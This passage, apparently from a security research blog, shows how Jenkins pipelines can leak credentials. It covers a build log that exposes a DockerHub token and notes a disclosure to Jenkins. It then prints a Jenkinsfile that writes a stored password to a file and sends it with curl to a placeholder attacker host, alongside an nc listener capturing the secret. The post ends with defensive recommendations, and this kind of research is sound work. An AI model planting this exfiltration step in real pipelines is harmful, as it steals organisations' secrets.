[Pipeline] { (outputting creds)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] withEnv
[Pipeline] {
[Pipeline] withCredentials
Masking supported pattern matches of $PASSWORD
[Pipeline] {
[Pipeline] }
[Pipeline] // withCredentials
[Pipeline] }
[Pipeline] // withEnv
[Pipeline] }
[Pipeline] // stage
[Pipeline] }
[Pipeline] // withEnv
[Pipeline] }
[Pipeline] // withEnv
[Pipeline] }
[Pipeline] // node
[Pipeline] End of Pipeline
Also: org.jenkinsci.plugins.workflow.actions.ErrorAction$ErrorId: 2cc26690-eb1f-411f-a8e1-53f7eaa11e20
java.lang.IllegalArgumentException: Expected named arguments but got [{file=/tmp/creds, text=dckr_pat_<REDACTED>, encoding=Base64}, org.jenkinsci.plugins.workflow.cps.CpsClosure2@6f6fbc23]
BINGO! The DockerHub PAT (dckr_pat_<REDACTED>) is dumped out into the build log.
I reported this security finding to the Jenkins team on 21st March 2025; it was acknowledged on 24th March 2025 and closed as a duplicate finding. I've not received any notification that the issue is fixed, and looking at the security advisory page there is no release addressing it. As it is well past the 90-day responsible disclosure window and the vulnerability is low in severity, I decided to publish this blog article.
Whilst dumping the credentials into the build log has restrictions, sending the credentials to a public endpoint is simple. Before we potentially expose an active DockerHub PAT to the internet, let’s change it out for a representative username and password.
pipeline {
    agent any
    tools { go '1.24.1' }
    environment {
        REPO = 'https://github.com/wakeward/demo-api-app.git'
        IMAGE_TAG = 'wakeward/demo-api-app'
        SECRET = 'test-secret'
    }
    stages {
        stage('outputting creds') {
            steps {
                withCredentials([usernamePassword(credentialsId: "${SECRET}", usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD')]) {
                    writeFile([file: "creds.txt", text: "${PASSWORD}"])
                    sh 'curl http://PUBLIC_IP:4444 --data "@creds.txt"'
                }
            }
        }
    }
}
Started by user jenkins
[Pipeline] Start of Pipeline
[Pipeline] node
Running on Jenkins in /var/lib/jenkins/workspace/cred-dump-test
[Pipeline] {
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (Declarative: Tool Install)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] }
[Pipeline] // stage
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (outputting creds)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] withEnv
[Pipeline] {
[Pipeline] withCredentials
Masking supported pattern matches of $PASSWORD
[Pipeline] {
[Pipeline] writeFile
Warning: A secret was passed to "writeFile" using Groovy String interpolation, which is insecure.
Affected argument(s) used the following variable(s): [PASSWORD]
See https://jenkins.io/redirect/groovy-string-interpolation for details.
[Pipeline] sh
+ curl http://PUBLIC_IP:4444 --data @creds.txt
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
And we receive the following connection.
wakeward@ubu-skyhook-2024:~$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on <JENKINS-PUBLIC-IP> 53758
POST / HTTP/1.1
Host: PUBLIC_IP:4444
User-Agent: curl/8.5.0
Accept: */*
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
SuperSecretToken
So that's it. We've deep dived into configuring a pipeline to build and test a Go binary, build a container image and ship it to a registry. We've seen different methods of executing malicious code and the complexities of using Docker for agents. Hopefully it is clear that using dedicated, ephemeral build agents reduces the risk of compromise, and that where possible, temporary credentials (such as workload identity) should be used to integrate with other services. Next up, GitLab.